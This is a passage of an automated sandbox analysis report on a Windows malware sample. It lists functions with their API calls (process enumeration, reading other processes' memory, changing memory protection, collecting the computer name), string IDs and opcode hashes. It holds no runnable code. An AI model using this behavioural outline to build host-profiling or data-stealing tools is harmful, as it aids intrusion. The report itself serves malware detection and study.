                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,00409186,?,?,?,?,00000000,?,00001000,?), ref: 00417E44
                                                        • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417E98
                                                        • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
                                                        • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
                                                        • Part of subcall function 00417E80: memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                                      • String ID: string too long
                                                      • API String ID: 2304785028-2556327735
                                                      • Opcode ID: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
                                                      • Instruction ID: 8cc79b66cb5b519718e58846ad6fe927743ec070db89bb510543436db22b056f
                                                      • Opcode Fuzzy Hash: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
                                                      • Instruction Fuzzy Hash: 7C31D5323086148BD7209A6CE8809ABF7F5EF92764B20466FF55187781C7759C81839D
                                                      Function 00408850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408883
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                      • String ID: vector<T> too long$yxxx$yxxx
                                                      • API String ID: 2884196479-1517697755
                                                      • Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction ID: f6320a326fa35fb652fe96cf34ebbd2c7a3c7ab078b6e18e070c860f9a0826fc
                                                      • Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction Fuzzy Hash: 333197B5E005159BCB08DF58C9916AEBBB6EB88310F14827EE905EB385DB34AD01CBD5
                                                      Function 02C8F2D7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F30A
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8F325
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F386
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID: ERROR
                                                      • API String ID: 3722407311-2861137601
                                                      • Opcode ID: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
                                                      • Instruction ID: d78506274a66f7347d86ae153b7fd4ac4a9f38dacfde5103ac07209420c6f737
                                                      • Opcode Fuzzy Hash: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
                                                      • Instruction Fuzzy Hash: 27216DB46106869BDB10FF3ACC45E9D37A5EF64308F448528EC49DBA40EB38E944EF91
                                                      Function 02C92F07 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02C92F36
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C92F3D
                                                      • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C92F51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateComputerNameProcess
                                                      • String ID: @LC
                                                      • API String ID: 1664310425-1019364593
                                                      • Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction ID: c1a12ed827c0a093e58e7ae46251cc2627e9aa4f86e53485d8923576d45620e9
                                                      • Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction Fuzzy Hash: 6B01D672B44614ABC714CF99ED45B9AF7BCF744B21F10026AFD15D3780D7B559008AE1
                                                      Function 00408710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408737
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                      • String ID: vector<T> too long$yxxx$yxxx
                                                      • API String ID: 2884196479-1517697755
                                                      • Opcode ID: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
                                                      • Instruction ID: b8ef7efc7810e4325e39fc60aebade5df8dffd74ddad37b5b040afbd6501b1a9
                                                      • Opcode Fuzzy Hash: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
                                                      • Instruction Fuzzy Hash: 26F06D27B000210BC314A43E9E8449EA94657E539037AD67AE89AFF399DC74EC8285D9
                                                      Function 00408D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,00408C6B,00000000,?,?,00000000), ref: 00408D62
                                                      • std::exception::exception.LIBCMT ref: 00408D7D
                                                      • __CxxThrowException@8.LIBCMT ref: 00408D92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: $KC
                                                      • API String ID: 3448701045-1012773322
                                                      • Opcode ID: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
                                                      • Instruction ID: b2a08596474d7957a22417a507aa23d885842d8934a0086806a9bcddfe39eae7
                                                      • Opcode Fuzzy Hash: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
                                                      • Instruction Fuzzy Hash: 68E02B7050060997CB14FBB49D016BFB3A89F00305F40076EE911A21C1EF78D614C19E
                                                      Function 02C8C437 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C477
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
                                                      • Instruction ID: 57accb85e1cd1404f87e4c17c137f68ef274033584a49350c0372a03ef402e1f
                                                      • Opcode Fuzzy Hash: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
                                                      • Instruction Fuzzy Hash: 61316070E002469BDB14BFB5DD88A6D7BB6EB85308F148476D811E7290D774CA84EFA1
                                                      Function 02C8F0F7 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8F126
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F13D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F164
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F16B
                                                      • lstrcpy.KERNEL32(00000000,00434F94), ref: 02C8F199
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID:
                                                      • API String ID: 367037083-0
                                                      • Opcode ID: e4b45a5bf4cf7a6b35286c05ec90594b85cd4af978226eb9eeaabd1dfbc3da08
                                                      • Instruction ID: 2a75296df9b7d25c18d43dfdd9a09c48e007d691946a63a623a7feba4581c3b2
                                                      • Opcode Fuzzy Hash: e4b45a5bf4cf7a6b35286c05ec90594b85cd4af978226eb9eeaabd1dfbc3da08
                                                      • Instruction Fuzzy Hash: 4331C175A005825BD710BB78DC49E6E7BA6EF50308F448024EC09DB650EF34DD49AFD2
                                                      Function 02C93E87 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C93ECD
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C93EE0
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C93EF6
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C9402E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1066202413-0
                                                      • Opcode ID: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
                                                      • Instruction ID: a18d315c245098fea72a2beda155e33fc17c1ae674daf7492a2a8b4bb6c57211
                                                      • Opcode Fuzzy Hash: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
                                                      • Instruction Fuzzy Hash: 6F810271900254CFCB28CF18C94CB95B7F1FB84329F29D1E9E4099B2A2D7769982CF90
                                                      Function 02C92693 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02C926B9
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C92795
                                                      • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 02C927F7
                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C928D6), ref: 02C92809
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MemoryProcessRead$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 268806267-0
                                                      • Opcode ID: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
                                                      • Instruction ID: ca49b9cdde85b14219855cda6856090092dd3c01bcb8ed36e15d3ec46302ffbb
                                                      • Opcode Fuzzy Hash: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
                                                      • Instruction Fuzzy Hash: 4841A271A00219ABDF20CF64D888BAEB7B6FF84724F148129ED55EB240D335EE51CB91
                                                      Function 02C74CC7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02C74D02
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C74D09
                                                      • strlen.MSVCRT ref: 02C74D96
                                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02C74E17
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcessProtectVirtualstrlen
                                                      • String ID:
                                                      • API String ID: 2355128949-0
                                                      • Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction ID: 1f4650b9c6a4bafc6aa752750bf2a0fc005c53403724ad12361b28b31217711a
                                                      • Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction Fuzzy Hash: C931F8A0B8022C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA
                                                      Function 02C880E7 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C880FF
                                                        • Part of subcall function 02C9A637: std::exception::exception.LIBCMT ref: 02C9A64C
                                                        • Part of subcall function 02C9A637: __CxxThrowException@8.LIBCMT ref: 02C9A661
                                                        • Part of subcall function 02C9A637: std::exception::exception.LIBCMT ref: 02C9A672
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C8811D
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C88138
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,02C88021,00000000,?,?,00000000,?,02C793ED,?), ref: 02C8819B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                      • String ID:
                                                      • API String ID: 285807467-0
                                                      • Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction ID: 75aa6ce08c8c9d1bd0e5b62314e98000361c6a8befe6cf3e0cb37751c3ef987a
                                                      • Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction Fuzzy Hash: 0F2173313006045FD724EE6CDC90A3AF7E6BB95718FA48B2EE5928BB40DB71E9408795
                                                      Function 02C8EFB7 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8EFFB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F02A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8F038
                                                      • lstrcat.KERNEL32(?,00638930), ref: 02C8F053
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
                                                      • Instruction ID: 28f10be1a7a9f07580b5336606c7990210a31606e44b009d4f6cba572bf7197d
                                                      • Opcode Fuzzy Hash: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
                                                      • Instruction Fuzzy Hash: 173192B5A001599FDB14EB64DC41FED77B6EF58304F1044A8BA0997290DF70AE84DF91
                                                      Function 02C8CC97 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8CCBC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8CCF9
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8CD28
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$strtok_s
                                                      • String ID:
                                                      • API String ID: 2610293679-0
                                                      • Opcode ID: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
                                                      • Instruction ID: 32d8beee3bf0266b601830bc7ab7828bead289606cc834add419e537298d68d6
                                                      • Opcode Fuzzy Hash: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
                                                      • Instruction Fuzzy Hash: 2621EFB1E00249AFDB24EFB49D84BAE7BB5EB48308F104066D815E7280E7748A458BA1
                                                      Function 02C883E5 Relevance: 6.1, APIs: 4, Instructions: 79stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8841C
                                                      • lstrlen.KERNEL32(00000000), ref: 02C88462
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88491
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 02C884A9
                                                      • lstrlen.KERNEL32(00000000), ref: 02C884E7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88516
                                                      • strtok_s.MSVCRT ref: 02C88526
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
                                                      • Instruction ID: 5aa8bcb38f98b6a57c2070f9309720e1ceb97b06c325eda8352ce70ad672e5e4
                                                      • Opcode Fuzzy Hash: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
                                                      • Instruction Fuzzy Hash: 4E21F7769002099BDB21EFA8DC54B9ABBF4EF80318F54C25DEC49D7640EB34DA46CB90
                                                      Function 02C89057 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcessstrtok_s
                                                      • String ID:
                                                      • API String ID: 3407564107-0
                                                      • Opcode ID: e32d8f13d92b4f8be065ea15d8ae7a751741077e79e59938cdf0aef7d257bcc6
                                                      • Instruction ID: 1b6c45c193bc0cdfa5649c39656c53dfec2c588489c5601a56c9e748cbcf03fc
                                                      • Opcode Fuzzy Hash: e32d8f13d92b4f8be065ea15d8ae7a751741077e79e59938cdf0aef7d257bcc6
                                                      • Instruction Fuzzy Hash: A1015275A00209FBCB10DFA5DC848AE77B9EB88314F008176E90597240E7759A458BA5
                                                      Function 02C937F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C93826
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C9382D
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 02C93848
                                                      • wsprintfA.USER32 ref: 02C9386E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                      • String ID:
                                                      • API String ID: 2922868504-0
                                                      • Opcode ID: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
                                                      • Instruction ID: e1932597c3e80f5fc9cc825c8133700ba5d8f069220092a904ae9c4b65528ad7
                                                      • Opcode Fuzzy Hash: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
                                                      • Instruction Fuzzy Hash: 9401D8B1F04654AFDB18DF98DC49BAEB7B9FF44710F00016AF906E7380D7B499008AA5
                                                      Function 02C92F97 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A5E0,000000FF), ref: 02C92FC6
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C92FCD
                                                      • GetLocalTime.KERNEL32(?,?,00000000,0042A5E0,000000FF), ref: 02C92FD9
                                                      • wsprintfA.USER32 ref: 02C93005
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                      • String ID:
                                                      • API String ID: 377395780-0
                                                      • Opcode ID: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
                                                      • Instruction ID: e36ea55864ceb75fd556ce5c52734ed0b2613149fd914bf11c9d359ea8bcafb3
                                                      • Opcode Fuzzy Hash: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
                                                      • Instruction Fuzzy Hash: FC0192B2904224ABCB149BC9DD45FBFB7BDFB4CB11F00010AFA05A2280E7B84840C7B1
                                                      Function 02C948F7 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000), ref: 02C94909
                                                      • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C94924
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C9492B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C9495E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                                      • String ID:
                                                      • API String ID: 4028989146-0
                                                      • Opcode ID: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                                                      • Instruction ID: 5a78637dc1e0308eef7c1bf94359541f47cbe03336f8b7e1c676c7e464dbeb24
                                                      • Opcode Fuzzy Hash: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                                                      • Instruction Fuzzy Hash: DEF0F6B19016256FEB31ABB49C4DBE9BBADAF45304F0404A4FA85D7180DBF08985CBE4
                                                      Function 02C97787 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                      • lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcatlstrcpylstrlen
                                                      • String ID: ------
                                                      • API String ID: 3050337572-882505780
                                                      • Opcode ID: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                                                      • Instruction ID: bfaf9c563bcaad9646b44bcc3f7e9b9bec333a9078f7c04a6134b97a5903b0e4
                                                      • Opcode Fuzzy Hash: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                                                      • Instruction Fuzzy Hash: 4AF039B4911302CFDB209F35D88C922BBFAEF98B04318882DA88AC7314EB30D440CF60
                                                      Function 02C83787 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
